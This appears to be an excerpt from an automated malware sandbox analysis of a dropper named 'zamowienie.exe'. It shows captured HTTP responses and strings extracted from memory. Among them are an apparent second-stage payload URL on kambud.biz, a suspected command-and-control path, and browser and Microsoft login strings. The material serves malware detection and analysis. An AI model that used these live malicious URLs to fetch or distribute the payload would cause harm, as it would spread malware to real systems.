    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 5d18c69d-b52f-4fc3-b1ae-01bb60fb5ea6x-runtime: 0.034907content-length: 17042connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 76479084-936f-46e8-a604-cf2f4b663d72x-runtime: 0.033822content-length: 18058connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 11:28:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 67 79 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 11:28:25 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 67 79 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 11:28:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 67 79 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 11:28:31 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 67 79 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>
    Source: zamowienie.exeString found in binary or memory: http://crl.apple.com/root.crl0
    Source: zamowienie.exeString found in binary or memory: http://crl.apple.com/timestamp.crl0
    Source: zamowienie.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: zamowienie.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: dmQRVBQMPL.exe, 00000008.00000002.3908164269.0000000004E55000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3808.app
    Source: dmQRVBQMPL.exe, 00000008.00000002.3908164269.0000000004E55000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3808.app/t4fd/
    Source: zamowienie.exeString found in binary or memory: http://www.apple.com/appleca0
    Source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: zamowienie.exe, 00000003.00000001.2433379972.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: zamowienie.exe, 00000003.00000001.2433379972.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
    Source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/
    Source: zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/:
    Source: zamowienie.exe, 00000003.00000002.2942527960.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2942603184.0000000004DD9000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842830620.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2968852172.00000000342E0000.00000004.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842507580.0000000004DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/uCEVRNHZgMA26.bin
    Source: zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/uCEVRNHZgMA26.bin(
    Source: zamowienie.exe, 00000003.00000002.2942603184.0000000004DD9000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842507580.0000000004DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/uCEVRNHZgMA26.bin6
    Source: zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/uCEVRNHZgMA26.binv
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033G
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
    Source: verclsid.exe, 00000007.00000003.3126244657.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
    Source: zamowienie.exeString found in binary or memory: https://www.apple.com/appleca/0
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005EDC000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.00000000033EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_se
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_n
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_host
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.svarus.online&amp;reg_source=parking_auto
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownHTTPS traffic detected: 185.17.43.223:443 -> 192.168.2.5:49876 version: TLS 1.2
